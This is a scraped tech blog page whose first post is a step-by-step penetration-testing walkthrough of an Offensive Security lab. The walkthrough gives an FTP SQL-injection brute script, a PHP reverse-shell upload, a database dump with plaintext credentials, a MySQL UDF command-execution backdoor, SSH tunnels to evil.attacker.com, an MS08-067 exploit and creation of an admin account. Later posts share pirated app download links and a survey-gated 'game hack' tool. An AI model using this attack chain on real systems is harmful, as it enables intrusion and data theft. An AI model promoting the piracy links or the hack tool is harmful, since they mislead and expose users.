Penetration Testing in the Real World By Offensive Security

 Why browsing on the internet, I found an excellent video regarding penetration testing in real world by offensive security. Penetration testing in the real world is really difficult from what you do inside testing environments like webgoat, DVWA tools etc. There are lots of security mechanisms being implemented now a days like IDS, IPS, firewalls etc. Therefore Penetration testing in the real world has became quite difficult. In the following video the instructor explains penetration testing in real world. He goes right away from exploiting the Filetransfer protocol right up to gaining administrator access to the machine.


Penetration Testing in the Real World from Offensive Security on Vimeo.

ftp-brute.py

#!/usr/bin/pythonfrom ftplib import FTPprint "Attempting user Directory Discover via FTP"for i in range(0,6):username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; -- "password=str("1")ftp=FTP('www.offseclabs.com')ftp.login(username,password)print "Logged in as user "+str(i)+",1"ftp.retrlines('LIST')ftp.close()

Open Terminal A :


nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear
ftp www.offseclabs.com
username - bob
password - bob
(To enumerate the ftp server)
ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --
password - 1
(logged in to the ftp server)
pwd
ls
bye
clear
cd core
clear
nano brute.py --> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --
password - 1
(logged in as the fifth user)
ls
put rs.php --> (a reverse php shell) Download reverse PHP shell



-----------------------

Open Terminal B :

nc -lvp 80
-----------------------
Open Terminal C :
wget www.offseclabs.com/rs.php
(Then, at Terminal B, we got a reverse shell)
-----------------------
Go back to Terminal B :
(inside the reverse shell)
/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt
------------------------

Open a Firefox :
www.offseclabs.com/images/ccdump.txt
(we got the database dump)
-------------------------

Go back to Terminal A :
(inside the ftp server)
put up.html --> (file upload html file)
put up.php -- > (file upload php file)
-------------------------

Open Firefox :
www.offseclabs.com/up.html
(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)
** Details of lib_mysqludf_sys.so
---------------------------
Go back to Terminal A :
(quit the ftp server)
bye
clear
exit
(quit Terminal A)
----------------------------

Go back to Terminal B :

mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don't press Enter at this moment)

---------------------------
Open Terminal D :
nc -lvp 80
(go back to Terminal B and press enter, you will get reserver shell at Terminal D)

----------------------------
Open Terminal E :
nc -lvp 80
----------------------------

Go back to Terminal B :
(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');
(press enter and we got another reverse shell at Terminal E)

---------------------------
Go back to Terminal E :
(inside the reverse shell)
ping -c 1 10.150.0.20
clear
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)
-----------------------------

Open Terminal F :
netstat antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse

-----------------------------

Go back to Terminal D :
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)
clear
------------------------------
Go back to Terminal F :
cd core
nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444
(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add

---------------------------------
Go back to Terminal D :
(quit the tunnel)
exit
clear
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear
-----------------------------------

Open Terminal G :
netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1
(login to the 10.150.0.20 with username - hacker and password - hacker)

Read More

FBI Shutdowns Megaupload.com, Anonymous Shutdowns FBI

Megaupload.com was shut down by FBI on Thursday.

A day after a 24-hour blackout of popular Websites such as Wikipedia, Reddit and BoingBoing, which were protesting a pair of controversial anti-piracy bills(SOPA/PIPA) making their way through Congress, FBI stepped in and shut down one of the world's largest file-sharing sites Megaupload.com, also charged four people connected to it in New Zealand and seized Millions in cash from the authorities. However three of the higher authorities are on the run and thought not to be in New Zealand.

Kim Dotcom former CEO of Megaupload.com was Captured by FBI

Online piracy by the two companies - Megaupload Ltd and Vestor Ltd - made   more than $ 175 million in criminal proceeds and caused more than half a billion dollars in harm to copyright owners

Banner on Megaupload.com after taken down by FBI.

However, after megaupload was shuttered by FBI, Anonymous - a group of hackers retaliated by taking down DOJ and many White House websites. Fbi.gov was also taken down but was recovered lately. The hacking group released a document on file-sharing site Pastebin.com listing the websites they planned  to attack along with the names of US Democratic Party leaders and MPAA employees and their families.

The details included property values,  work and home phone numbers and addresses as well as the names, ages and schools of the member's children.

A screen shot of the dossier of MPAA and US Democratic Party members and their families compiled and published by Anonymous.

The document posted on postbin.com also said 'We Anonymous are launching our largest attack ever on government and music industry sites. Lulz. 'The FBI didn't think they would get away with this did they? They should have expected us.'

"Megaupload was taken down w/out SOPA being law. Now imagine what will happen if it passes. The Internet as we know it will end. FIGHT BACK," wrote @YourAnonNews on Twitter in a reference to the ongoing battle in Congress over the controversial Stop Online Piracy Act (SOPA).

This attack is thought to be the largest ever with 5000+ people involved in bringing down the government and entertainment industry websites.

Megaupload was unique not only because of the size and amount of contents, but also because of the high level of support from celebrities, musicians and other content producers that are the most common victims of copyright infringement and piracy.

For many users, the shutdown had nothing to do with piracy and everything to do with the fact that their backups and data were now gone. 

If convicted each individual could be jailed for up to 20 years on the charges of five counts of racketeering, copyright infringement and conspiracy.

Read More

How To Save Multiple Web Pages In One ZIP File

Maybe you want to save Web pages for offline reading, or maybe you want to archive a page you created.

There are all sorts of reason to want to save pages, but it can be hard to tackle saving multiple pages at once. ZipTabs is a Chrome extension that lets you save any or all open tabs in one ZIP file, making the process much smoother and more convenient, Here's how to use it:

1. Download and install the SingleCore extension. This is required to use ZipTabs, but you don't need to do any more than install it. 
2. Download and install ZipTabs. 
3. Restart Chrome. 
4. When you've got a set of tabs open to Web pages you want to save, just click the ZipTabs icon in the upper right and select which open tabs to save.
5. Select a name for the ZIP file, then click "OK." 
6. When the ZIP file is created (it can take a little while), it is saved to Chrome's download folder. This can't be changed, though you can point Chrome toward a different folder in its Options settings. 

That's it. Your ZIP file is easy to save and share.

Read More

50 Hand Picked Android

Release Name: 50 Hand Picked Android Apps-Avengr

Release Date: 12/17/2011

Filename: apk

Size: 74.18 MB

Release Description

As the Android app market grows it gets harder and harder to separate the golden Android apps from the so-so Android dross. Here's a list of 50 hand-picked Android apps that you don't want to pass by.

http://www.filesonic.com/file/fY4Uj3f/50_ Hand_Picked_Android_ Apps-Avengr.rar

Read More

Audio Cambridge Advanced 3.2.94 (Android)

Audio Cambridge Advanced 3.2.94 (Android)

Overview: Cambridge English dictionary with over 70,000 words, phrases and examples.

Requirements: Android 2.0+

The Audio Cambridge Advanced Learner's Dictionary provides definitions for about 170,000 words, phrases and examples and is compiled to offer what learners need most in a dictionary.

The Third Edition offers new, up-to-date vocabulary (e.g. sex up, speed-dating, whiteboard), new 'mini-collocation' boxes, and new frequency information to highlight the most important words to learn. The new Cambridge Advanced Learner's Dictionary gives you everything you need to learn English and pass exams!

Over 170,000 words, phrases and examples

Over 79,800 high-quality English audio recordings with UK and US English pronunciations compiled and recorded by Cambridge University Press

You will find newly added Illustrations and photos to illustrate the word definitions.

Common grammar and style and usage labels included

Examples included in the word definitions show you how to use words in the most natural and fluent way.

All the important new words that have come into the language (e.g. dirty bomb, lairy, 9/11, clickable)

Only words from a defining vocabulary used to help make definitions easy to understand

Over 90,000 examples, mainly full sentences, show you how English is used in context and help you write natural English.

25,000 collocations show the way words work together in English

Automatic recognition of inflected forms

The MSDict Dictionary Format

The Cambridge Advanced Learner's Dictionary is here presented in MSDict electronic format. MSDict offers best experience in mobile reference and is available for any handheld platform.

Quick dynamic search of words while you type

Transcriptions facilitating pronunciation

Hyperlinks between different related words

History to see the last 50 words you have looked up

Support for memory cards

Filters to help you locate the word you are searching for:

o Fuzzy filter- used when you are not sure of the correct spelling of a word

o Keyword-used to locate the instances of a key word within other compound words

o Wild card - "?" and "*" replace a letter and group of letters in words

Fast article scrolling

Ability to have dictionary Word of the day as a widget on the phone home screen

Ability to search words in the installed dictionaries through the standard phone search feature

http://www.filesonic.com/file/VqJCw7I/Audio.Cambridge.Advanced.3.2.94.Android.zip

http://bitshare.com/files/9fox5126/Audio.Cambridge.Advanced.3.2.94.Android.zip.html

Read More

Tutorial to Create DTree Menu

DTree is a menu that be arranged like a tree. It will be like menu when you open "windows Explorer". It's very useful if you have many posting (article) in your blog. It can contain many link in small space. It will be like the below image :



Here's the step by step tutorial to create "DTree Menu" in blogger:

1. Login to Blogger, go to "Layout --> Edit HTML"
2. Put the code below over <head>

<link rel="StyleSheet" href="http://destroydrop.com/javascripts/tree/v1/tree.css" type="text/css" />
<script type="text/javascript" src="http://destroydrop.com/javascripts/tree/v1/tree.js"></script>

3. Save your editting.

4. Now edit end copy the below code then put on your sidebar.

<div class="dtree">
<script type="text/javascript">
<!--
d = new dTree('d');
d.add(0,-1,'My example tree');
d.add(1,0,'Node 1','link.html');
d.add(2,1,'Node 1.1','link.html');
d.add(3,2,'Node 1.1.1','link.html');
d.add(4,3,'Node 1.1.1.1','link.html');
d.add(5,0,'Node 2','link.html');
d.add(6,5,'Node 2.1','link.html');
d.add(7,5,'Node 2.2','link.html');
d.add(8,0,'Node 3','link.html');
d.add(9,0,'Node 5','link.html');
document.write(d);
//-->
</script>
</div>

Change "link.html" with your own link.
The first number must be unique (d.add(1,0,'Node 1','link.html');
The second number is child of the number (look at the color).

You can add the below code to add a new node with your own image

d.add(10,0,'Profile','link.html','','','http://blogoholic.info/files/dtree/trash.gif');

change "http://blogoholic.info/files/dtree/trash.gif" with your own image.
it will be like this :

Read More

Sync Files Socially With Dropbox

Dropbox lets us to sync files across our computers and mobile devices. So that we could access our important files from anywhere around the world.

DropBox allows us to backup all kind of Digital Files including Videos, Images, Documents, Raw files, etc..

All You Have To Do Is:

• Go to Dropbox.com and sign up for a free account (2Gb Free)
• Download Dropbox Application For Your OS (Dropbox Works With Windows, Mac, & Linux Platforms)
• Install The Software On Your Desktops, Laptops, And Mobile Devices.
• Start Synchronizing Your Files For Free.>

After installing dropbox, A new folder named 'Dropbox' will be created in 'My Documents'. You can store all files that you want to sync across your device in that folder.You can also create a Public Folder for sharing files with public.

Link: Dropbox.com

Read More

Show or Hide Your Full Post in Blogger

This is the way to show or hide your full post on the main page of your blog. This is different from my old "Read More" methods. If in old "Read More" Methods it will show "Read More" link, then if you click the link you will load and go to another page that will show your full post/article. But with my next method below, if you click the link you will see your full post/article in the same page and it no needs time to load, it only expand your full post. Do you want to try it? here is the trick:

1. Login to Blogger, Chose "Layout --> Template --> Edit HTML
2. Click "Download Full Templates" link to back up your template.
3. Check on the "Expand Template Widget" Check Box.
4. Copy the code below and paste above this code </head>

<script src='http://code.google.com/p/read-more-blogger/source/browse/trunk/js/read-more.js' type='text/javascript'/>

5. Then find this code <div class='post-header-line-1'/> .
6. If You found it you will see a code like this:

<div class='post-body entry-content'>

or

<div class='post body'>

7. The next step is change or replace the code (Only Number 6 code) to be like this:

<div class='post-body entry-content' expr:id='"post-" + data:post.id'>
<b:if cond='data:blog.pageType == "item"'></b:if>

8. Under it you will see a code like this <p><data:post.body/></p>
9. Put the code below under it.

<b:else/>
<style>#fullpost {display:none;}</style>
<p><data:post.body/></p>
<span id='showlink'>
<p><a expr:onclick='"javascript:showFull(\"post-" + data:post.id + "\");"' href='javascript:void(0);'>[+/-] Show Full Post...</a></p>
</span>
<span id='hidelink' style='display:none'>
<p><a expr:onclick='"javascript:hideFull(\"post-" + data:post.id + "\");"' href='javascript:void(0);'>[+/-]Hide Full Post...</a></p>
</span>
<script type='text/javascript'>checkFull("post-" + "<data:post.id/>")</script>
</b:if>

10. So, the full code will like this :

<div class='post-header-line-1'/>
<div class='post-body entry-content' expr:id='"post-" + data:post.id'>
<b:if cond='data:blog.pageType == "item"'>
<p><data:post.body/></p>

<b:else/>
<style>#fullpost {display:none;}</style>
<p><data:post.body/></p>
<span id='showlink'>
<p><a expr:onclick='"javascript:showFull(\"post-" + data:post.id + "\");"' href='javascript:void(0);'>[+/-] Show Full Post...</a></p>
</span>
<span id='hidelink' style='display:none'>
<p><a expr:onclick='"javascript:hideFull(\"post-" + data:post.id + "\");"' href='javascript:void(0);'>[+/-] Hide Full Post...</a></p>
</span>
<script type='text/javascript'>checkFull("post-" + "<data:post.id/>")</script>
</b:if>

11. Save Your Editing.
12. Go to menu "Setting --> Formatting"
13. On the bottom page you will see a box beside text "Post Template". Copy the code below and paste in to the box

<span id="fullpost"></span>


</span>

14. Save your setting.
15 If you want to post an article place your part article above this code <span id="fullpost">. Then the remain or full post put between this code <span id="fullpost"> and this </span>

GOOD LUCK>>>>>

Read More

Change The Address bar Icon (Favicon)

If you open a web/blog you will see an icon on address-bar. If you make blog in blogger your default icon will be like this:
But you can change the icon (favicon) with your own picture. it's very simple to do that. The first thing you have to do is prepare an image with low dimension, it's about 22x22 pixel to 32x32 pixel, actually bigger is no problem but it will reduce speed to open your web/blog. And they can be formatted as gif, jpg, bmp, ico, png. Then you store your image to web hosting. But if don't know how to make it or don't want to occupied you can use the icon listed below. OK lets begin the trick.

1. Login to blogger, chose "Layouts --> Edit HTML
2. Put the code below into your <head> tag or before <head> code.

<link href="http://www.iconfinder.com/ajax/download/ico/?id=15216&s=128" rel='SHORTCUT ICON'/>
3. The bold text is an address for your icon, you can change it with your own or just you can get from here

http://www.iconfinder.com 

4. Save your editing.

Read More

How to Disable Facebook Timeline

Another method to remove facebook timeline..

Few weeks back Facebook started updating Timeline feature for all users. Some people don’t like this new Facebook Timeline Feature. There is no Option to Go back to Old Profile Layout. Most of the people Mailing us regarding “How to Disable the Timeline” so we came up with this post. Before that You should know its not the permanent solution and it only works in your browser, because we are going to do simple trick in your browsers. So others can view your timeline, but u can’t able to view Timeline.

Read More

List Of Windows Shortcut Key

Many people who do not know the shortcut keys in windows so for them i am going to put some of the useful shortcut keys in this post...Hope You like....



For Real Windows Newbie's here you go... 

CTRL+C (Copy)

CTRL+X (Cut)

CTRL+V (Paste)

CTRL+Z (Undo)

DELETE (Delete)

SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)

CTRL while dragging an item (Copy the selected item)

CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)

F2 key (Rename the selected item)

CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)

CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)

CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)

CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)

CTRL+SHIFT with any of the arrow keys (Highlight a block of text)

SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop or select text in a document)

CTRL+A (Select all)

F3 key (Search for a file or a folder)

ALT+ENTER (View the properties for the selected item)

ALT+F4 (Close the active item, or quit the active program)

ALT+ENTER (Display the properties of the selected object)

ALT+SPACEBAR (Open the shortcut menu for the active window)

CTRL+F4 (Close the active document in programs that enable you to have multiple documents open Simultaneously)

ALT+TAB (Switch between the open items)

ALT+ESC (Cycle through items in the order that they had been opened)

F6 key (Cycle through the screen elements in a window or on the desktop)

F4 key (Display the Address bar list in My Computer or Windows Explorer)

SHIFT+F10 (Display the shortcut menu for the selected item)

ALT+SPACEBAR (Display the System menu for the active window)

CTRL+ESC (Display the Start menu)

ALT+Underlined letter in a menu name (Display the corresponding menu)

Underlined letter in a command name on an open menu (Perform the corresponding command)

F10 key (Activate the menu bar in the active program)

RIGHT ARROW (Open the next menu to the right, or open a submenu)

LEFT ARROW (Open the next menu to the left, or close a submenu)

F5 key (Update the active window)

BACKSPACE (View the folder one level up in My Computer or Windows Explorer)

ESC (Cancel the current task)

SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)

Dialog Box Keyboard Short-cuts

CTRL+TAB (Move forward through the tabs)

CTRL+SHIFT+TAB (Move backward through the tabs)

TAB (Move forward through the options)

SHIFT+TAB (Move backward through the options)

ALT+Underlined letter (Perform the corresponding command or select the corresponding option)

ENTER (Perform the command for the active option or button)

SPACE BAR (Select or clear the check box if the active option is a check box)

Arrow keys (Select a button if the active option is a group of option buttons)

F1 key (Display Help)

F4 key (Display the items in the active list)

BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)



Microsoft Natural Keyboard Shortcuts

Windows Logo (Display or hide the Start menu)

Windows Logo+BREAK (Display the System Properties dialog box)

Windows Logo+D (Display the desktop)

Windows Logo+M (Minimize all of the windows)

Windows Logo+SHIFT+M (Restore the minimized windows)

Windows Logo+E (Open My Computer)

Windows Logo+F (Search for a file or a folder)

CTRL+Windows Logo+F (Search for computers)

Windows Logo+F1 (Display Windows Help)

Windows Logo+ L (Lock the keyboard)

Windows Logo+R (Open the Run dialog box)

Windows Logo+U (Open Utility Manager)

Accessibility Keyboard Shortcuts

Right SHIFT for eight seconds (Switch FilterKeys either on or off)

Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)

Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)

SHIFT five times (Switch the StickyKeys either on or off)

NUM LOCK for five seconds (Switch the ToggleKeys either on or off)

Windows Logo +U (Open Utility Manager)

Windows Explorer Keyboard Shortcuts

END (Display the bottom of the active window)

HOME (Display the top of the active window)

NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)

NUM LOCK+Plus sign (+) (Display the contents of the selected folder)

NUM LOCK+Minus sign (-) (Collapse the selected folder)

LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)

RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)

Short-cut Keys for Character Map

After you double-click a character on the grid of characters, you can move through the grid by using the Keyboard short-cuts:

RIGHT ARROW (Move to the right or to the beginning of the next line)

LEFT ARROW (Move to the left or to the end of the previous line)

UP ARROW (Move up one row)

DOWN ARROW (Move down one row)

PAGE UP (Move up one screen at a time)

PAGE DOWN (Move down one screen at a time)

HOME (Move to the beginning of the line)

END (Move to the end of the line)

CTRL+HOME (Move to the first character)

CTRL+END (Move to the last character)

SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)

Microsoft Management Console (MMC) Main Window Keyboard Shortcuts

CTRL+O (Open a saved console)

CTRL+N (Open a new console)

CTRL+S (Save the open console)

CTRL+M (Add or remove a console item)

CTRL+W (Open a new window)

F5 key (Update the content of all console windows)

ALT+SPACEBAR (Display the MMC window menu)

ALT+F4 (Close the console)

ALT+A (Display the Action menu)

ALT+V (Display the View menu)

ALT+F (Display the File menu)

ALT+O (Display the Favorites menu)

MMC Console Window Keyboard Shortcuts

CTRL+P (Print the current page or active pane)

ALT+Minus sign (-) (Display the window menu for the active console window)

SHIFT+F10 (Display the Action shortcut menu for the selected item)

F1 key (Open the Help topic, if any, for the selected item)

F5 key (Update the content of all console windows)

CTRL+F10 (Maximize the active console window)

CTRL+F5 (Restore the active console window)

ALT+ENTER (Display the Properties dialog box, if any, for the selected item)

F2 key (Rename the selected item)

CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)

Remote Desktop Connection Navigation

CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)

ALT+PAGE UP (Switch between programs from left to right)

ALT+PAGE DOWN (Switch between programs from right to left)

ALT+INSERT (Cycle through the programs in most recently used order)

ALT+HOME (Display the Start menu)

CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)

ALT+DELETE (Display the Windows menu)

CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)

CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)

Microsoft Internet Explorer Navigation

CTRL+B (Open the Organize Favorites dialog box)

CTRL+E (Open the Search bar)

CTRL+F (Start the Find utility)

CTRL+H (Open the History bar)

CTRL+I (Open the Favorites bar)

CTRL+L (Open the Open dialog box)

CTRL+N (Start another instance of the browser with the same Web address)

CTRL+O (Open the Open dialog box, the same as CTRL+L)

CTRL+P (Open the Print dialog box)

CTRL+R (Update the current Web page)

CTRL+W (Close the current window)

Read More

How To Deactivate/Disable Facebook Timeline in Firefox and Google Chrome

It’s been a while since Facebook made available its Timeline feature to all users. People who really like this new feature are the minorities, as no one wants anymore changes in Facebook. But as time goes by, Facebook users get used to the revamped layout every time their team come up with something new to change the interface of one of the top visited websites today.

Read More

Insert your friend's pictures into chat with new Facebook Gimmick

Facebook has introduced a new Gimmick that allows you to instantly make photos, logos and other images appear in chat windows.

Read More

Buy world cheapest tablet-Aakash Tablet

Hi..friends...world's cheapest tablet Aakash Tablet is now selling online.It has many features and functionality.And one important thing is it can also be used as Phone.

Read More

Free Download Limbo Game

Hi...friends.... Now A Days A Limbo Game is hot favorite.Really it is a awesome game.All are waiting for it.So i will provide you a Limbo game free.

Read More

Find any number you need, fast. With PhoneTell's application

hi...friends..there are many number of contact number in world.To remember/save all number is impossible.Today i am sharing with you one application that provide you to find phone numbers for local businesses,customer service numbers, people and more....

Read More

Microsoft's New Social Networking Site for Students-So.cl

Hi...friends...In today's world no of Social Networking site are increases.But now a days Microsoft launches it's Social Networking site for students.Welcome So.cl to the list of social networking websites. Microsoft has just launched a social network, which is aimed at students all around the world.

Read More

Free Download Mountain Car Game

Hi…friends if you are crazy for car game then be ready for play the car game…..

If you like powerful offroad cars and overcoming obstacles, this free car game is for you! Here you will get a chance to test your driving skills in difficult conditions. Realistic settings, various obstacles and all these are in full 3D! You need to be very cautious in order to overcome all obstacles and not to overturn your vehicle. In this free car game you must pass the entire route to proceed to another level. Passing of each level is facilitated by a certain amount of pre given scores, which diminish by every second. The sooner you pass the track, the more scores you get. In fact, this is not as easy as it may look at the first glance. Gain the highest score and you will be spoken about as a mountain sports car professional! Download free car game, become the only winner!

Read More

Top Ten Videos Of 2011 in Youtube

Looking for ways to kill time? You might want to browse a list of most watched videos on Youtube in the year 2011. Youtube, which is the most popular video sharing website today, has just released the top ten most watched videos for 2011.

Read More

Tips to increase loading speed of your blogger blog

Google has already declared that loading speed of the blog is an important factor for search engine ranking.That’s why most of the bloggers now are working on how can they reduce the loading time of their wordpress blog because most of the bloggers are now on WordPress.

Read More

10 best gadgets of the year 2011

Hi.....Friends today I will Share 10 best Gadgets of the year 2011..See it really Awesome....

1) Samsung Galaxy S II: One of the biggest competitor to Apple's iPhone, the Samsung Galaxy S II has sold more than 10 million units since its launch. Among the Galaxy S II's features are a dual-core 1.2 GHz processor, 1 GB of RAM and a Super AMOLED Plus screens, which are stunningly bright and make for an extremely sharp, colorful display. The Samsung Galaxy S II is photo-ready with a built-in 8 megapixel rear-facing camera, with a 2 megapixel cam up front for video chat. All three devices can record video in 1080p HD

Read More

Top 5 Music Phones under Rs 5,000

Hi...friends we all are crazy for Mobile.But main thing is Cost.Today I will Share a Top 5 Music Phones Under Rs. 5000.See all Phones and buy which you want....

Read More

Free Download The Sims Social Hack

The Sims Social – The Sims Social Hack

Sims Social Hack Tool will help your SIM level up fast and easy!

Works on PC, Mac and Linux Computers
Runs on latest Firefox, IE, Chrome, Safari and Opera browers.
This Tool is 100% Free

The  Sims Social Hack Tools.zip

Here`s how to download Sims Social Hack Tool:

1. Click the icon above
2. Answer the Survey Question, it takes only 2mins
3. Click on Regular Download ( Premium for a member, no survey )
4. Save the file to your computer
5. Unzip, open Read me file for instructions
6. Run the tool and Enjoy!

How to use the Sims Social Hack Tool:

1. Run the exe file.
2. Type in your Facebook Account Email, it is where to distribute the resources.
3. Enter the desired value of resources and hit generate.
4. Log in to your Facebook Account and play the game.
5. All resources are distributed to your account. Enjoy!

Read More

Make FireFox Addons Compatible

Right often we end up having to install new version of Firefox and some of our add-ons are not updated to that new version. Here I'll give you a tutorial on how to make them compatible with your new version..

1) Use any add-on.. For this tut I'll use Add 'N Edit Cookie:- https://addons.mozilla.org/nl/firefox/addon/573. 

2) Use any other browser than Firefox to download it. It'll start downloading in .xpi format.

3) Change the format from .xpi to .zip

4) Open the .zip file using WinRAR, WinZIP or any other similar program. When you're viewing the archive, you'll notice several files. The one we need will be Install.rdf. Extract it.

5) Right-click on it and open it with any suitable editor. Lets say notepad.

6) Press ctrl+F to open the FIND dialg box. Type "maxVersion"

7) You'll see that the value of maxVersion will be 3.0. Change the 0 to 5. Save it.

8) Open your Firefox. press ctrl+O and open the add-on .xpi file. It'll install the add-on. Restart your Firefox and VOLIA!! You have it! Enjoy. ;)

Read More

Check If Someone Else I Using Your Facebook AccountI

Now a days security of your Facebook account is much more important. Because hackers will hack your account and do some unsuspected activities with you account.

So here is a way of checking that, if some one is using your Facebook account or not.
You can check all Login information and also location for your account.

Go to Facebook.com -> Account -> Account Settings -> Account Security.

Here you’ll see a list of all computers and mobile devices that have logged into your Facebook account and when. You can also see the approximate geographic location of the device, based on the IP address, that was used to access your Facebook account.

If you come across an unknown device / location in the list, say you are Mac user and the device listed is IE on Windows, just click the corresponding “end activity” link and it should immediately log you out from that machine.

For extra safety, you may also choose to receive email and SMS alerts if someone else tries to log into your Facebook account from a previously unknown computer or mobile.


By Prashant Jethwa....

Read More

Hide Your Online Status on Facebook Chat from Selected friends

If you are connected with too many people on Facebook and need to hide your online status on Facebook Chat from certain contacts, here's some help.

Step 1: Go to chat room & than click on friend list.

Step 2 : Create a new list and than add your friends in it.

Step 3 : Than click on Go off line.. Now you are in visible (off line) for that group.

  

 

By Prashant Jethwa.....

Read More

Hashing Denial-Of-Service Attack

                                                     

          A recent research Alexander “alech” Klink and Julian “zeri” Wälde shows that more than half of Internet is vulnerable to Hashing Denial of service vulnerability. The HDOS vulnerability exploits the hash tables consuming more than 99% of the CPU usage hence causing a Denial of service attack.

          The security researchers demonstrated the  HDOS vulnerability at 28th Chaos Communication Congress security conference in Berlin, Germany, Earth, Milky Way. The talk was titled as "Efficient Denial of Service Attacks on Web Application Platforms". The reaserch shows that most of the web programming languages including PHP, ASP.NET, Java, Python, Ruby, Apache Tomcat (The list goes on and on) are vulnerable to the HDOS vulnerability

          PHP 5, Java, ASP.NET as well as V8 are fully vulnerable to this issue and PHP 4, Python and Ruby are partially vulnerable, depending on version or whether the server running the code is a 32-bit or 64-bit machine.
     
         Hash tables are a commonly used data structure in most programming languages," they explained. "Web application servers or platforms commonly parse attacker-controlled POST form data into hash tables automatically, so that they can be accessed by application developers. If the language does not provide a randomized hash function or the application server does not recognize attacks using multi-collisions, an attacker can degenerate the hash table by sending lots of colliding keys.

        The algorithmic complexity of inserting n elements into the table then goes to O(n**2), making it possible to exhaust hours of CPU time using a single HTTP request."

Demonstration

The researchers have also posted a video demonstration as a proof of the vulnerability.

Countermeasures

        Mircosoft has also provided the workaround for the asp.net vulnerability, You can find it here.

     PHP advises to limit the number of different http request parameters. For this purpose PHP has added a max_input_vars function which gives the flexibility to limit the number of paramters.

Furthur Resources:

If you would like to learn more about the vulnerability, here are some useful links:

http://www.ocert.org/advisories/ocert-2011-003.html

http://permalink.gmane.org/gmane.comp.security.full-disclosure/83694

Read More